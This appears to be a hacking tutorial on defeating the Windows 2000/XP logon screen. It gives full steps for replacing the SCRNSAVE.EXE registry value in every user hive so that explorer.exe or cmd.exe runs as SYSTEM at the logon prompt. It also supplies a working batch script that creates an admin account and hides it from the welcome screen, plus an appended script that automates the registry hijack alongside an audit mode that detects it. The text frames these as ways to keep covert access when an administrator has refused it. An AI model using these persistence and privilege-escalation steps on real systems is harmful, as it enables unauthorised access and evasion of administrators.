Bypassing the logon screen (Windows 2000/XP)

In Windows 95, 98 and ME it was possible to bypass the logon process by pressing the 'Esc' key at the logon prompt. The prompt would vanish and the desktop would appear normally, with access restrictions only on some folders.

In Windows 2000 and XP there are two basic groups of users: ordinary users (the Users group) and admin users (the Administrators group), and each account may or may not have a password. If an account has a password you must know it in order to log on; otherwise you will not get to the desktop.

If you have access to an account with admin privileges it is possible to create a password reset disk. Insert a floppy in the drive, then go to Start - Run and type exactly as it appears below:

rundll32 keymgr.dll,PRShowSaveWizardExW

The export name after the comma is case sensitive. The command opens the 'Forgotten Password Wizard', which writes an emergency disk for the account you are currently logged on as (in fact any local account can make one for itself, and the disk only works for that one account). You will not actually recover the lost password: the disk lets you define a new one at the logon screen.

Let's suppose there is an administrator who does not give you an admin account. If some day you find a local exploit for Windows 2000/XP that somehow is not yet patched on your network, using it to gain admin access to the system is a nice option, but after some hours or days it will be patched for sure and will no longer work. Besides, antivirus software will detect your exploit as a type of virus, so beware. After successful exploitation, creating a user account with admin rights, even if you hide it (I will show how later), is not a good idea: if the admin looks via the command prompt he/she will see the created account, its date of creation, etc. The better way is to alter a value in the Windows registry so that the logon screen can be bypassed. This is what happens: if you leave your computer and nobody touches the mouse or keyboard, by default after some minutes the screensaver is executed.
The same happens if you leave the computer at the logon screen, with the difference that there the screensaver is started by winlogon under the SYSTEM account. So if you change the name of the screensaver to another application, such as cmd.exe or explorer.exe, that application will be executed in its place. Now, supposing you have admin access to the computer, open the registry editor by clicking 'Start' - 'Run' and typing regedit. The registry editor will open. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. In the right pane change the data of the REG_SZ value called SCRNSAVE.EXE from logon.scr to explorer.exe, for example. Do the same thing in the other users' keys, HKEY_USERS\S-1-5-21-xxxx-xxxx-xxxx-xxxx\Control Panel\Desktop, where the xxxx parts are strings of digits (the account's SID), and also in
HKEY_USERS\S-1-5-18\Control Panel\Desktop and HKEY_USERS\S-1-5-19\Control Panel\Desktop (S-1-5-20 exists as well), and in any other key related to a specific user on the computer. The more users on the computer, the more keys exist under the root key HKEY_USERS, and you will have to change the SCRNSAVE.EXE value in each of them. If you think the time it takes before explorer.exe runs is too long, you can also change the timeout. The value is ScreenSaveTimeOut, also REG_SZ, measured in seconds: the default is 600 (ten minutes) but you can change it to, for example, 100. Make sure ScreenSaveActive in the same key is 1, otherwise no screensaver runs at all. Close regedit and reboot the computer. Leave it at the logon screen for that long, and when you return you should see the desktop just as if you had logged on normally.

Click the Start menu and look at the user name at the top... yes, it is the built-in account NT AUTHORITY\SYSTEM, which has at least every right an administrator has. You will notice, though, that not everything behaves as in a normal session: explorer.exe was started as a screensaver on the logon desktop rather than through a real interactive logon, so some shell features and Control Panel applets misbehave. What this method lacks is a proper logon session, not rights, and it is good enough because you can accomplish many useful things like browsing any user's folders, copying files, etc., and you could place an application in the All Users startup folder. In practice this gives you more than a normal administrator and far more than a restricted user.

As we are speaking of the logon screen, here is a simple script to hide user accounts from the XP welcome screen:

-------------------------hiddenuserxp.cmd-------------------------
@echo off
echo Script that creates a user with admin power and hides
echo it from the Windows XP welcome screen.
echo Beware: it is not totally hidden, system admins
echo can see it in the command prompt by typing 'net user'.
echo Username = user32 and password = userpwd
pause
net user user32 userpwd /add
net localgroup administrators user32 /add
net localgroup administradores user32 /add
rem The command above is for Windows XP in Portuguese; the group name varies with the OS language :P
rem Hide the account from the welcome screen. The value name must be the
rem account name itself (not the word 'user'); data 0 means hidden.
reg add "hklm\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist" /v user32 /t reg_dword /d 0 /f
exit
------------------------------------------------------------------

Save the above script as hiddenuserxp.cmd and double-click it to run. Notice that if you go to Control Panel, then User Accounts, you will not see the username 'user32' we have just created; but if you go to the command prompt (cmd.exe) and type net user, all the users including the new one will be displayed, so be careful.
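Both registry tricks in this text (the SCRNSAVE.EXE slot in every hive under HKEY_USERS, and the UserList value that hides an account) can be applied and checked from the command prompt instead of by hand in regedit. The script below is an added example written for this edit, not the original author's code or anything shipped with Windows: it assumes reg.exe is available (built into XP; a Support Tools add-on on Windows 2000), that it is run from an account in the Administrators group, and the file name hku_scrnsave.cmd is my own choice. /set and /restore perform the screensaver edits walked through above on every loaded hive at once; /audit is the check an administrator would run to spot both a hijacked screensaver slot and accounts hidden from the welcome screen, cross-checking the latter against 'net user' as the text warns.

```batch
@echo off
rem hku_scrnsave.cmd - added example, not part of the original text.
rem   hku_scrnsave.cmd /set <program> [timeout-seconds]   point every hive's screensaver slot at <program>
rem   hku_scrnsave.cmd /restore                           put logon.scr and the 600 s default back
rem   hku_scrnsave.cmd /audit                             report non-.scr slots and hidden accounts
rem Needs reg.exe and an account in the Administrators group.
setlocal enabledelayedexpansion
set "UL=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

if /i "%~1"=="/set"     goto set
if /i "%~1"=="/restore" goto restore
if /i "%~1"=="/audit"   goto audit
echo usage: %~nx0 /set ^<program^> [timeout-seconds] ^| /restore ^| /audit
goto :eof

:restore
set "PROG=logon.scr"
set "TIMEOUT=600"
goto apply

:set
set "PROG=%~2"
set "TIMEOUT=%~3"
if "%PROG%"=="" (echo /set needs a program name & goto :eof)
if "%TIMEOUT%"=="" set "TIMEOUT=100"

:apply
rem 'reg query hku' prints one key per line. Keep the real hives and drop the
rem SID_Classes keys, which carry no Desktop settings and should not get one.
for /f "tokens=*" %%K in ('reg query hku ^| findstr /i "HKEY_USERS\\" ^| findstr /v /i "_Classes"') do (
    echo [+] %%K\Control Panel\Desktop : %PROG% after %TIMEOUT% seconds
    reg add "%%K\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%PROG%" /f >nul
    reg add "%%K\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "%TIMEOUT%" /f >nul
    rem ScreenSaveActive must be 1 or the slot is never launched; this also re-enables it for users who turned it off.
    reg add "%%K\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f >nul
)
goto :eof

:audit
echo === SCRNSAVE.EXE in every loaded hive ===
for /f "tokens=*" %%K in ('reg query hku ^| findstr /i "HKEY_USERS\\" ^| findstr /v /i "_Classes"') do (
    rem a value line reads "SCRNSAVE.EXE  REG_SZ  logon.scr": token 2 is the type, the rest is the data
    for /f "tokens=2,*" %%T in ('reg query "%%K\Control Panel\Desktop" /v SCRNSAVE.EXE 2^>nul ^| findstr /i "SCRNSAVE"') do (
        set "SAVER=%%U"
        echo %%K : !SAVER!
        if /i not "!SAVER:~-4!"==".scr" echo     WARNING: slot points at a program that is not a .scr file
    )
)
echo === accounts hidden from the welcome screen ===
rem each value line reads "<name>  REG_DWORD  0x0"; data 0x0 hides that account name
for /f "tokens=1,3" %%N in ('reg query "%UL%" 2^>nul ^| findstr /i "REG_DWORD"') do (
    if /i "%%O"=="0x0" (
        rem cross-check with the SAM: net user exits non-zero when the account does not exist
        net user %%N >nul 2>&1 && echo hidden: %%N  ^(still listed by 'net user'^) || echo hidden: %%N  ^(no such local account^)
    )
)
goto :eof
```

Run hku_scrnsave.cmd /audit before and after trying the /set mode and the hiddenuserxp.cmd script: a slot that names anything other than a .scr file, or a UserList entry that matches an account 'net user' also lists, is exactly the trace the text says an admin will find.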